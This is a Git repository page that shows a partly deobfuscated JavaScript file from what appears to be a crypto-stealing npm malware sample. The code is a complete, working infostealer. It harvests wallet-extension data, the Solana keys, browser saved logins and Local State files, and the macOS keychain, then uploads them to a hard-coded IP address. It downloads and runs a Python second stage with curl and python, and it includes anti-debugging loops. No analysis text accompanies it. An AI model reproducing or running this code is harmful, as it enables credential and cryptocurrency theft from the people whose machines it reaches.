osmannyildiz
/
240822-CryptoVirus
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
240822-CryptoVirus/workspace/100_unobf.js

1130 lines
26 KiB
JavaScript
Raw Permalink Blame History

(function (_0x44fba7, _0x2d3696) {
const _0x127c6c = _0x44fba7();
while (true) {
try {
const _0x28078f =
(parseInt(_0x3c3c(660, -0x1df)) / 1) *
(-parseInt(_0x3c3c(395, -0x17c)) / 2) +
(-parseInt(_0x3c3c(617, -0x6c)) / 3) *
(parseInt(_0x3c3c(414, -0x181)) / 4) +
parseInt(_0x3c3c(645, -81)) / 5 +
(-parseInt(_0x3c3c(525, -585)) / 6) *
(-parseInt(_0x3c3c(486, -522)) / 7) +
(-parseInt(_0x3c3c(438, -0x26)) / 8) *
(-parseInt(_0x3c3c(316, -367)) / 9) +
parseInt(_0x3c3c(502, "0x331")) / 10 +
(-parseInt(_0x3c3c(640, 0x408)) / 11) *
(parseInt(_0x3c3c(566, -0x1)) / 12);
if (_0x28078f === _0x2d3696) {
break;
} else {
_0x127c6c.push(_0x127c6c.shift());
}
} catch (_0x36124d) {
_0x127c6c.push(_0x127c6c.shift());
}
}
})(_0x39f3, 677390);
function _0xc3354c(_0x195576, _0x2e72e8, _0x36cbba, _0x1e01d4, _0x369e67) {
return _0x3c3c(_0x2e72e8 + 0x26a, _0x369e67);
}
function _0x39f3() {
const _0x4bce1a = [
"nt/",
"ess",
"nNJqK",
"sIdXm",
"pekpl",
"14hZCmCf",
"hostn",
"fgpgk",
"ensio",
"(((.+",
"wGKfQ",
"round",
"le/Ch",
"pndod",
"getTi",
"Firef",
"fhboh",
'n3 "',
"FyMzG",
"ajnim",
"mifAT",
"106440HPCKHO",
"_file",
"Micro",
"$]*)",
"acces",
"ilkdb",
"forEa",
"IHDYu",
"blMoY",
"dlcob",
"bind",
"era S",
"KDJPM",
"googl",
"write",
"/stor",
"ogin.",
"cfgod",
"164.1",
"le ",
"knocf",
"uts",
"vvjfn",
"3555282mDfnHE",
"idb",
"ructo",
"init",
"/AppD",
"ame",
"efaul",
"pjiig",
"eSync",
"e-chr",
"keych",
"ejbal",
"post",
"FileS",
"dJNuo",
'"retu',
"omihk",
"rrDzZ",
"mdjon",
"jbmgj",
"const",
"ctor(",
"ary/A",
".ldb",
"fig/s",
"irSyn",
"input",
"/.npl",
"\\p.zi",
"mDmfh",
"oFXHe",
"ocal/",
"retur",
"rmSyn",
"agRLK",
"kodbe",
"filen",
"YyWbq",
"aeaoe",
"aeach",
"oaZSK",
"66684waJVTu",
"on.ex",
"eByao",
"xjaWr",
".log",
"oihof",
"ACRQM",
"idlcd",
"UjBZv",
'-Lo "',
"terva",
"JNVVE",
'" "',
"txt",
"/clie",
"dOnrh",
"fig/",
"oftwa",
"/User",
"pytho",
"behhm",
"olana",
"type",
"omjjk",
"jblnd",
"Defau",
"LMYJl",
"/ld_",
"nkbih",
"lguNB",
"re/Op",
"repla",
"hTMmC",
"ware/",
"n (fu",
"tjpqk",
"imael",
"get",
"des",
"homed",
"fbeog",
"fdial",
"ata/L",
"RyThU",
"ngcna",
"table",
"pikoo",
"BlNJh",
"ile",
"oohck",
" -C ",
"92238XrFMeu",
"ata/R",
"multi",
"Z_$][",
"__pro",
" Data",
"//95.",
"creat",
"url",
"gger",
"WXfqr",
"gKuNA",
"MyuWG",
"eebol",
"setIn",
"path",
"child",
"\\+\\+ ",
"/Chro",
"-Brow",
"Data",
"ase",
"kpcnl",
"2860lKmSWp",
"xtens",
"oogle",
"n() ",
"_lst",
"6054975aHsZvP",
"{}.co",
"lmome",
"OmxkM",
"apagc",
"state",
"era",
"warn",
"xf ",
"/pdow",
")+)+)",
"apply",
"fysYY",
"reque",
"ave-B",
"59DRyyBR",
"MOUNY",
"ort/",
"http:",
"soft/",
"\\p2.z",
"peras",
"ata",
"nctio",
"proto",
"copyF",
"*(?:[",
"psQWX",
"ata/",
"rn th",
"WHmeU",
"UkRZd",
"IThhi",
'is")(',
"isDir",
"cionb",
"/id.j",
"1224",
"ZsOHd",
"_proc",
"/.con",
"0-9a-",
"sSync",
"call",
"bfnae",
"pebkl",
"ation",
"onoee",
"funct",
"Brows",
"knmef",
"PclYM",
"/Brav",
"l Ext",
"bohpj",
"\\pyth",
"conso",
"/Libr",
"ZVvYd",
"azniY",
"ins/l",
"logkc",
"hHTgi",
"toStr",
"hifaf",
'e" "',
"XyDtz",
"gpafn",
"zGTHN",
"/Goog",
"ERzFu",
"ZVkwR",
"ary/K",
"searc",
"/Logi",
"Strea",
"dOolM",
"ort/B",
"ctIBb",
"debu",
"1251wsmSfG",
"gmccd",
"hlefn",
"actio",
"a-zA-",
"re/Br",
"oAegw",
"ldhgm",
"BOFuv",
"eRead",
"lipeo",
"mCyoN",
"ome",
"7.24:",
"Softw",
"raveS",
"lchlg",
"_uld",
"aholp",
"ector",
"ibnej",
"lmeee",
"HddSr",
"ain",
"vxgDK",
"formD",
"curl ",
"/Loca",
"join",
"inclu",
"strin",
"kWhSf",
" Supp",
"ophhp",
"YkxfX",
"Local",
"exec",
"illa/",
"exist",
"brld_",
"hnfan",
"statS",
"Edge/",
"MncBw",
"QByuA",
"RrOGI",
"lsgQI",
"com.o",
"size",
"eofbd",
"bakop",
"e) {}",
"-rele",
"pplic",
"opera",
"ads",
"a_id.",
"oamin",
"YyDaD",
"dHcDC",
"hid",
"zA-Z_",
"gbUcv",
"tmpdi",
"g/Moz",
"ync",
"son",
"dfjmm",
"nstru",
"age/d",
"trace",
"YyBiM",
"ciYJT",
"jgjfh",
"lengt",
"NfIly",
"eSoft",
"imhlp",
"Yccfh",
"18180HOsCXD",
"hfood",
"moz-e",
"ing",
"acmac",
"to__",
"orm",
"vZyku",
"tion",
"bKcmf",
"rome",
"bbldc",
"ort/G",
"dirna",
"nkdna",
"solan",
"\\( *\\",
"Objec",
"\\.pyp",
"12rduOPH",
"push",
" (tru",
"l Sta",
"bohma",
"/uplo",
"readd",
"ser",
"User ",
"ofile",
"GSyZJ",
"kkolj",
"tings",
"n Dat",
"HOuuj",
"-db",
"Googl",
"UddtF",
"YJKSn",
"ion",
"rave-",
"are/B",
"renam",
"ion *",
"19800MEQCMb",
"eycha",
"EapJa",
"rQUUg",
"odkjb",
"while",
"Roami",
"Profi",
"hecda",
"rowse",
"ox/Pr",
"test",
"e/Chr",
"fyXOW",
"info",
"ng/Op",
"Brave",
"XxWsG",
"100",
"tar -",
"dgmol",
"mnkoe",
"ApZSt",
"FwPCp",
"mFzMQ",
"tGUEz",
"nhcel",
"DrzqI",
"count",
"pld_",
"phepc",
"error",
"ccfch",
"nmhnf",
"mgjnj",
"platf",
".file",
"n Set",
"dgcij",
"log",
"excep",
"chain",
"re.Op",
];
_0x39f3 = function () {
return _0x4bce1a;
};
return _0x39f3();
}
const _0x4c5b23 = (function () {
let _0x1b18dc = true;
return function (_0xe16044, _0x543257) {
const _0x2f2ffe = _0x1b18dc
? function () {
if (_0x543257) {
const _0x18b663 = _0x543257.apply(_0xe16044, arguments);
_0x543257 = null;
return _0x18b663;
}
}
: function () {};
_0x1b18dc = false;
return _0x2f2ffe;
};
})();
const _0x3b6c3a = _0x4c5b23(this, function () {
return _0x3b6c3a
.toString()
.search("(((.+)+)+)+$")
.toString()
.constructor(_0x3b6c3a)
.search("(((.+)+)+)+$");
});
_0x3b6c3a();
function _0x5956dd(_0x2c12cc, _0x562caa, _0xf3cda1, _0x112575, _0x3278d3) {
return _0x3c3c(_0x2c12cc - 0x3e8, _0x562caa);
}
const _0x5aaba1 = (function () {
let _0x21d7ac = true;
return function (_0x1f54fd, _0x3286b6) {
const _0x1c338a = _0x21d7ac
? function () {
if (_0x3286b6) {
const _0x24e17f = _0x3286b6.apply(_0x1f54fd, arguments);
_0x3286b6 = null;
return _0x24e17f;
}
}
: function () {};
_0x21d7ac = false;
return _0x1c338a;
};
})();
(function () {
_0x5aaba1(this, function () {
const _0x5a19ce = new RegExp("function *\\( *\\)");
const _0x17f146 = new RegExp("\\+\\+ *(?:[a-zA-Z_$][0-9a-zA-Z_$]*)", "i");
const _0x25534a = _0x4420e3("init");
if (
!_0x5a19ce.test(_0x25534a + "chain") ||
!_0x17f146.test(_0x25534a + "input")
) {
_0x25534a("0");
} else {
_0x4420e3();
}
})();
})();
const _0x3bc966 = (function () {
let _0x580fb9 = true;
return function (_0x330c98, _0x2beb0b) {
const _0x177202 = _0x580fb9
? function () {
if (_0x2beb0b) {
const _0x317a45 = _0x2beb0b.apply(_0x330c98, arguments);
_0x2beb0b = null;
return _0x317a45;
}
}
: function () {};
_0x580fb9 = false;
return _0x177202;
};
})();
const _0x2578ed = _0x3bc966(this, function () {
let _0x3ea8de;
try {
const _0x28cf7e = Function(
'return (function() {}.constructor("return this")( ));'
);
_0x3ea8de = _0x28cf7e();
} catch (_0x311356) {
_0x3ea8de = window;
}
const _0x34c636 = (_0x3ea8de.console = _0x3ea8de.console || {});
const _0x273d87 = [
"log",
"warn",
"info",
"error",
"exception",
"table",
"trace",
];
for (let _0xf875e9 = 0; _0xf875e9 < _0x273d87.length; _0xf875e9++) {
const _0x2bf515 = _0x3bc966.constructor.prototype.bind(_0x3bc966);
const _0x1b503d = _0x273d87[_0xf875e9];
const _0x26c2d2 = _0x34c636[_0x1b503d] || _0x2bf515;
_0x2bf515.__proto__ = _0x3bc966.bind(_0x3bc966);
_0x2bf515.toString = _0x26c2d2.toString.bind(_0x26c2d2);
_0x34c636[_0x1b503d] = _0x2bf515;
}
});
_0x2578ed();
const _0x221e62 = require("fs");
const _0x59f958 = require("os");
const _0x16f8fd = require("path");
const _0x4401f3 = require("request");
const _0x23399b = require("child_process").exec;
const _0x11bcda = _0x59f958.hostname();
const _0x5b1776 = _0x59f958.platform();
const _0x4bb365 = _0x59f958.homedir();
const _0x1a8fee = _0x59f958.tmpdir();
const _0xfb8109 = (_0x3eadf7) =>
_0x3eadf7.replace(/^~([a-z]+|\/)/, (_0x12a1f6, _0x1ba9e4) =>
"/" === _0x1ba9e4
? _0x4bb365
: _0x16f8fd.dirname(_0x4bb365) + "/" + _0x1ba9e4
);
function _0x250532(_0x1465db, _0x532b27, _0x26afbf, _0x5da9e2, _0x300210) {
return _0x3c3c(_0x26afbf - 0x1b8, _0x1465db);
}
function _0x1ab9bf(_0xb3ef4) {
try {
_0x221e62.accessSync(_0xb3ef4);
return true;
} catch (_0x26ea17) {
return false;
}
}
const _0x2b4167 = [
"Local/BraveSoftware/Brave-Browser",
"BraveSoftware/Brave-Browser",
"BraveSoftware/Brave-Browser",
];
const _0x68a749 = ["Local/Google/Chrome", "Google/Chrome", "google-chrome"];
const _0x4bc964 = [
"Roaming/Opera Software/Opera Stable",
"com.operasoftware.Opera",
"opera",
];
const _0xee7e1c = [
"nkbihfbeogaeaoehlefnkodbefgpgknn",
"ejbalbakoplchlghecdalmeeeajnimhm",
"fhbohimaelbohpjbbldcngcnapndodjp",
"hnfanknocfeofbddgcijnmhnfnkdnaad",
"ibnejdfjmmkpcnlpebklmnkoeoihofec",
"bfnaelmomeimhlpmgjnjophhpkkoljpa",
"aeachknmefphepccionboohckonoeemg",
"hifafgmccdpekplomjjkcfgodnhcellj",
"jblndlipeogpafnldhgmapagcccfchpi",
"acmacodkjbdgmoleebolmdjonilkdbch",
"dlcobpjiigpikoobohmabehhmhfoodbb",
"aholpfdialjgjfhomihkjbmgjidlcdno",
];
const _0x24f986 = async (_0x1d3df7, _0x412da6, _0x24e69b, _0x553b63) => {
let _0x2ecf34;
if (!_0x1d3df7 || "" === _0x1d3df7) {
return [];
}
try {
if (!_0x1ab9bf(_0x1d3df7)) {
return [];
}
} catch (_0x2952dc) {
return [];
}
if (!_0x412da6) {
_0x412da6 = "";
}
let _0x2e4663 = [];
for (let _0x37ffe9 = 0; _0x37ffe9 < 200; _0x37ffe9++) {
const _0x8e554d =
_0x1d3df7 +
"/" +
(0 === _0x37ffe9 ? "Default" : "Profile " + _0x37ffe9) +
"/Local Extension Settings";
for (let _0x1c09fe = 0; _0x1c09fe < _0xee7e1c.length; _0x1c09fe++) {
let _0x3539f9 = _0x8e554d + "/" + _0xee7e1c[_0x1c09fe];
if (_0x1ab9bf(_0x3539f9)) {
let _0x47a29c = [];
try {
_0x47a29c = _0x221e62.readdirSync(_0x3539f9);
} catch (_0x422150) {
_0x47a29c = [];
}
_0x47a29c.forEach(async (_0x48fa42) => {
let _0x34d24d = _0x16f8fd.join(_0x3539f9, _0x48fa42);
try {
const _0x52fa84 = {
filename:
"100_" +
_0x412da6 +
_0x37ffe9 +
"_" +
_0xee7e1c[_0x1c09fe] +
"_" +
_0x48fa42,
};
if (_0x34d24d.includes(".log") || _0x34d24d.includes(".ldb")) {
_0x2e4663.push({
value: _0x221e62.createReadStream(_0x34d24d),
options: _0x52fa84,
});
}
} catch (_0x4ee56e) {}
});
}
}
}
if (
_0x24e69b &&
((_0x2ecf34 = _0x4bb365 + "/.config/solana/id.json"),
_0x221e62.existsSync(_0x2ecf34))
) {
try {
const _0x43d2ad = {
filename: "solana_id.txt",
};
_0x2e4663.push({
value: _0x221e62.createReadStream(_0x2ecf34),
options: _0x43d2ad,
});
} catch (_0x12a52b) {}
}
_0x5cd59c(_0x2e4663, _0x553b63);
return _0x2e4663;
};
const _0x14af0b = (_0xad7998) => {
const _0x1177fd =
_0xfb8109("~/") + "/AppData/Roaming/Mozilla/Firefox/Profiles";
let _0x453aab = [];
if (_0x1ab9bf(_0x1177fd)) {
let _0x4b6185 = [];
try {
_0x4b6185 = _0x221e62.readdirSync(_0x1177fd);
} catch (_0x120404) {
_0x4b6185 = [];
}
let _0x3a0b7b = 0;
_0x4b6185.forEach(async (_0x87e610) => {
let _0x31c3d3 = _0x16f8fd.join(_0x1177fd, _0x87e610);
if (_0x31c3d3.includes("-release")) {
let _0x74f34f = _0x16f8fd.join(_0x31c3d3, "/storage/default");
let _0x1e112e = [];
_0x1e112e = _0x221e62.readdirSync(_0x74f34f);
let _0x196a6b = 0;
_0x1e112e.forEach(async (_0x41aba7) => {
if (_0x41aba7.includes("moz-extension")) {
let _0x17680c = _0x16f8fd.join(_0x74f34f, _0x41aba7);
_0x17680c = _0x16f8fd.join(_0x17680c, "idb");
let _0x36c4ce = [];
_0x36c4ce = _0x221e62.readdirSync(_0x17680c);
_0x36c4ce.forEach(async (_0x525690) => {
if (_0x525690.includes(".files")) {
let _0x15cccd = _0x16f8fd.join(_0x17680c, _0x525690);
let _0x20b7e = [];
_0x20b7e = _0x221e62.readdirSync(_0x15cccd);
_0x20b7e.forEach((_0x48b8f2) => {
if (
!_0x221e62
.statSync(_0x16f8fd.join(_0x15cccd, _0x48b8f2))
.isDirectory()
) {
let _0x2bfd15 = _0x16f8fd.join(_0x15cccd, _0x48b8f2);
const _0x583f5f = {
filename: _0x3a0b7b + "_" + _0x196a6b + "_" + _0x48b8f2,
};
_0x453aab.push({
value: _0x221e62.createReadStream(_0x2bfd15),
options: _0x583f5f,
});
}
});
}
});
}
});
_0x196a6b += 1;
}
_0x3a0b7b += 1;
});
_0x5cd59c(_0x453aab, _0xad7998);
return _0x453aab;
}
};
const _0x5cd59c = (_0x2e686b, _0x503b06) => {
const _0xf5f49f = {
type: "10",
};
_0xf5f49f.hid = "100_" + _0x11bcda;
_0xf5f49f.uts = _0x503b06;
_0xf5f49f.multi_file = _0x2e686b;
try {
if (_0x2e686b.length > 0) {
const _0x436416 = {
url: "http://95.164.17.24:1224/uploads",
formData: _0xf5f49f,
};
_0x4401f3.post(_0x436416, (_0x4aa250, _0x21c325, _0x10adc0) => {});
}
} catch (_0x48978c) {}
};
const _0x2a59b7 = async (_0x18d248, _0x182fbc, _0x54e47e) => {
try {
let _0x3356e0 = "";
_0x3356e0 =
"d" == _0x5b1776[0]
? _0xfb8109("~/") + "/Library/Application Support/" + _0x18d248[1]
: "l" == _0x5b1776[0]
? _0xfb8109("~/") + "/.config/" + _0x18d248[2]
: _0xfb8109("~/") + "/AppData/" + _0x18d248[0] + "/User Data";
await _0x24f986(_0x3356e0, _0x182fbc + "_", 0 == _0x182fbc, _0x54e47e);
} catch (_0x383f95) {}
};
const _0x12f379 = async (_0x1e9e22) => {
let _0x2d28cb = [];
let _0x145d11 = _0x4bb365 + "/Library/Keychains/login.keychain";
if (_0x221e62.existsSync(_0x145d11)) {
try {
const _0x4160a5 = {
filename: "logkc-db",
};
_0x2d28cb.push({
value: _0x221e62.createReadStream(_0x145d11),
options: _0x4160a5,
});
} catch (_0x12011e) {}
} else {
_0x145d11 += "-db";
if (_0x221e62.existsSync(_0x145d11)) {
try {
const _0xf0cec0 = {
filename: "logkc-db",
};
_0x2d28cb.push({
value: _0x221e62.createReadStream(_0x145d11),
options: _0xf0cec0,
});
} catch (_0x103f4c) {}
}
}
try {
let _0x399950 = _0x4bb365 + "/Library/Application Support/Google/Chrome";
if (_0x1ab9bf(_0x399950)) {
for (let _0x114250 = 0; _0x114250 < 200; _0x114250++) {
const _0x570e8e =
_0x399950 +
"/" +
(0 === _0x114250 ? "Default" : "Profile " + _0x114250) +
"/Login Data";
try {
if (!_0x1ab9bf(_0x570e8e)) {
continue;
}
const _0x5c4d9a = _0x399950 + "/ld_" + _0x114250;
const _0x287456 = {
filename: "pld_" + _0x114250,
};
if (_0x1ab9bf(_0x5c4d9a)) {
_0x2d28cb.push({
value: _0x221e62.createReadStream(_0x5c4d9a),
options: _0x287456,
});
} else {
_0x221e62.copyFile(_0x570e8e, _0x5c4d9a, (_0x40ecae) => {
const _0x122dac = {
filename: "pld_" + _0x114250,
};
let _0x58f0ab = [
{
value: _0x221e62.createReadStream(_0x570e8e),
options: _0x122dac,
},
];
_0x5cd59c(_0x58f0ab, _0x1e9e22);
});
}
} catch (_0x5d8148) {}
}
}
} catch (_0x3222d7) {}
try {
let _0x40a431 =
_0x4bb365 + "/Library/Application Support/BraveSoftware/Brave-Browser";
if (_0x1ab9bf(_0x40a431)) {
for (let _0x4d6de8 = 0; _0x4d6de8 < 200; _0x4d6de8++) {
const _0x3dd6d5 =
_0x40a431 +
"/" +
(0 === _0x4d6de8 ? "Default" : "Profile " + _0x4d6de8);
try {
if (!_0x1ab9bf(_0x3dd6d5)) {
continue;
}
const _0x35bc30 = _0x3dd6d5 + "/Login Data";
const _0x1d6812 = {
filename: "brld_" + _0x4d6de8,
};
if (_0x1ab9bf(_0x35bc30)) {
_0x2d28cb.push({
value: _0x221e62.createReadStream(_0x35bc30),
options: _0x1d6812,
});
} else {
_0x221e62.copyFile(_0x3dd6d5, _0x35bc30, (_0x495181) => {
const _0x4fede4 = {
filename: "brld_" + _0x4d6de8,
};
let _0x24592e = [
{
value: _0x221e62.createReadStream(_0x3dd6d5),
options: _0x4fede4,
},
];
_0x5cd59c(_0x24592e, _0x1e9e22);
});
}
} catch (_0xec9bf2) {}
}
}
} catch (_0x2d0639) {}
_0x5cd59c(_0x2d28cb, _0x1e9e22);
return _0x2d28cb;
};
const _0x2fd1f5 = async (_0x32674f, _0x324a89, _0x20f95c) => {
let _0x4b3a87 = [];
let _0x9786ec = "";
_0x9786ec =
"d" == _0x5b1776[0]
? _0xfb8109("~/") + "/Library/Application Support/" + _0x32674f[1]
: "l" == _0x5b1776[0]
? _0xfb8109("~/") + "/.config/" + _0x32674f[2]
: _0xfb8109("~/") + "/AppData/" + _0x32674f[0] + "/User Data";
let _0x87a744 = _0x9786ec + "/Local State";
if (_0x221e62.existsSync(_0x87a744)) {
try {
const _0xa15720 = {
filename: _0x324a89 + "_lst",
};
_0x4b3a87.push({
value: _0x221e62.createReadStream(_0x87a744),
options: _0xa15720,
});
} catch (_0x34f9b1) {}
}
try {
if (_0x1ab9bf(_0x9786ec)) {
for (let _0x1a33b2 = 0; _0x1a33b2 < 200; _0x1a33b2++) {
const _0x49e759 =
_0x9786ec +
"/" +
(0 === _0x1a33b2 ? "Default" : "Profile " + _0x1a33b2);
try {
if (!_0x1ab9bf(_0x49e759)) {
continue;
}
const _0x48e472 = _0x49e759 + "/Login Data";
if (!_0x1ab9bf(_0x48e472)) {
continue;
}
const _0x5e580a = {
filename: _0x324a89 + "_" + _0x1a33b2 + "_uld",
};
_0x4b3a87.push({
value: _0x221e62.createReadStream(_0x48e472),
options: _0x5e580a,
});
} catch (_0x1c09c2) {}
}
}
} catch (_0x4b2ff8) {}
_0x5cd59c(_0x4b3a87, _0x20f95c);
return _0x4b3a87;
};
let _0x31a77f = 0;
const _0x31f7b0 = async (_0x476610) => {
_0x23399b(
"tar -xf " + _0x476610 + " -C " + _0x4bb365,
(_0x50a5fe, _0x1311df, _0x4f246e) => {
if (_0x50a5fe) {
_0x221e62.rmSync(_0x476610);
return void (_0x31a77f = 0);
}
_0x221e62.rmSync(_0x476610);
_0x5d7fc6();
}
);
};
const _0x390031 = () => {
const _0x3cae78 = _0x1a8fee + "\\p.zi";
const _0x441266 = _0x1a8fee + "\\p2.zip";
if (_0x31a77f >= 51476596) {
return;
}
if (_0x221e62.existsSync(_0x3cae78)) {
try {
var _0x47fbbe = _0x221e62.statSync(_0x3cae78);
if (_0x47fbbe.size >= 51476596) {
_0x31a77f = _0x47fbbe.size;
_0x221e62.rename(_0x3cae78, _0x441266, (_0x284471) => {
if (_0x284471) {
throw _0x284471;
}
_0x31f7b0(_0x441266);
});
} else {
if (_0x31a77f < _0x47fbbe.size) {
_0x31a77f = _0x47fbbe.size;
} else {
_0x221e62.rmSync(_0x3cae78);
_0x31a77f = 0;
}
_0x349c50();
}
} catch (_0x1c7b1f) {}
} else {
_0x23399b(
'curl -Lo "' + _0x3cae78 + '" "' + "http://95.164.17.24:1224/pdown" + '"',
(_0x2d6828, _0x2b6e75, _0x3e8ba9) => {
if (_0x2d6828) {
_0x31a77f = 0;
return void _0x349c50();
}
try {
_0x31a77f = 51476596;
_0x221e62.renameSync(_0x3cae78, _0x441266);
_0x31f7b0(_0x441266);
} catch (_0x1b5f9d) {}
}
);
}
};
function _0x349c50() {
setTimeout(() => {
_0x390031();
}, 20000);
}
function _0x249add(_0x1d3a42, _0x5bc714, _0xd90dda, _0x1c48aa, _0xeb27c7) {
return _0x3c3c(_0x1c48aa + 878, _0x1d3a42);
}
(function () {
const _0x446458 = function () {
let _0x4df433;
try {
_0x4df433 = Function(
'return (function() {}.constructor("return this")( ));'
)();
} catch (_0x5b53c0) {
_0x4df433 = window;
}
return _0x4df433;
};
const _0x439ef6 = _0x446458();
_0x439ef6.setInterval(_0x4420e3, 4000);
})();
function _0x3c3c(_0x4911e8, _0x3920d9) {
const _0x52a3c2 = _0x39f3();
_0x3c3c = function (_0xb8bfff, _0x4926ac) {
_0xb8bfff = _0xb8bfff - 294;
let _0x3ca49c = _0x52a3c2[_0xb8bfff];
return _0x3ca49c;
};
return _0x3c3c(_0x4911e8, _0x3920d9);
}
const _0x5d7fc6 = async () =>
await new Promise((_0x50660d, _0x316911) => {
if ("w" == _0x5b1776[0]) {
if (_0x221e62.existsSync(_0x4bb365 + "\\.pyp\\python.exe")) {
(() => {
const _0x2ba886 = _0x4bb365 + "/.npl";
const _0x2f63bb =
'"' + _0x4bb365 + '\\.pyp\\python.exe" "' + _0x2ba886 + '"';
try {
_0x221e62.rmSync(_0x2ba886);
} catch (_0x21b5bc) {}
_0x4401f3.get(
"http://95.164.17.24:1224/client/10/100",
(_0x1d4f1f, _0x221411, _0x34bf1f) => {
if (!_0x1d4f1f) {
try {
_0x221e62.writeFileSync(_0x2ba886, _0x34bf1f);
_0x23399b(_0x2f63bb, (_0x16c374, _0xd2d92f, _0xc498d0) => {});
} catch (_0x301ee8) {}
}
}
);
})();
} else {
_0x390031();
}
} else {
(() => {
_0x4401f3.get(
"http://95.164.17.24:1224/client/10/100",
(_0xbf6210, _0x2d6ee2, _0x510eb2) => {
if (!_0xbf6210) {
_0x221e62.writeFileSync(_0x4bb365 + "/.npl", _0x510eb2);
_0x23399b(
'python3 "' + _0x4bb365 + '/.npl"',
(_0x1c5ced, _0x194764, _0x3e060c) => {}
);
}
}
);
})();
}
});
var _0x5e2457 = 0;
function _0x304de3(_0x6eccad, _0x21e92e, _0x1365d7, _0x5c072d, _0xfe94a7) {
return _0x3c3c(_0x1365d7 + 925, _0xfe94a7);
}
const _0x48b883 = async () => {
try {
const _0x399315 = Math.round(new Date().getTime() / 1000);
await (async () => {
try {
await _0x2a59b7(_0x68a749, 0, _0x399315);
await _0x2a59b7(_0x2b4167, 1, _0x399315);
await _0x2a59b7(_0x4bc964, 2, _0x399315);
_0x14af0b(_0x399315);
if ("w" == _0x5b1776[0]) {
await _0x24f986(
_0xfb8109("~/") + "/AppData/Local/Microsoft/Edge/User Data",
"3_",
false,
_0x399315
);
}
if ("d" == _0x5b1776[0]) {
await _0x12f379(_0x399315);
} else {
await _0x2fd1f5(_0x68a749, 0, _0x399315);
await _0x2fd1f5(_0x2b4167, 1, _0x399315);
await _0x2fd1f5(_0x4bc964, 2, _0x399315);
}
} catch (_0x51e49b) {}
})();
_0x5d7fc6();
} catch (_0x1efeeb) {}
};
_0x48b883();
_0x5d7fc6();
let _0xc34788 = setInterval(() => {
if ((_0x5e2457 += 1) < 5) {
_0x48b883();
} else {
clearInterval(_0xc34788);
}
}, 30000);
function _0x4420e3(_0x2266c4) {
function _0x380a40(_0x5065f6) {
if (typeof _0x5065f6 === "string") {
return function (_0x55a0bd) {}
.constructor("while (true) {}")
.apply("counter");
} else {
if (("" + _0x5065f6 / _0x5065f6).length !== 1 || _0x5065f6 % 20 === 0) {
(function () {
return true;
})
.constructor("debugger")
.call("action");
} else {
(function () {
return false;
})
.constructor("debugger")
.apply("stateObject");
}
}
_0x380a40(++_0x5065f6);
}
try {
if (_0x2266c4) {
return _0x380a40;
} else {
_0x380a40(0);
}
} catch (_0x221881) {}
}
Reference in New Issue View Git Blame Copy Permalink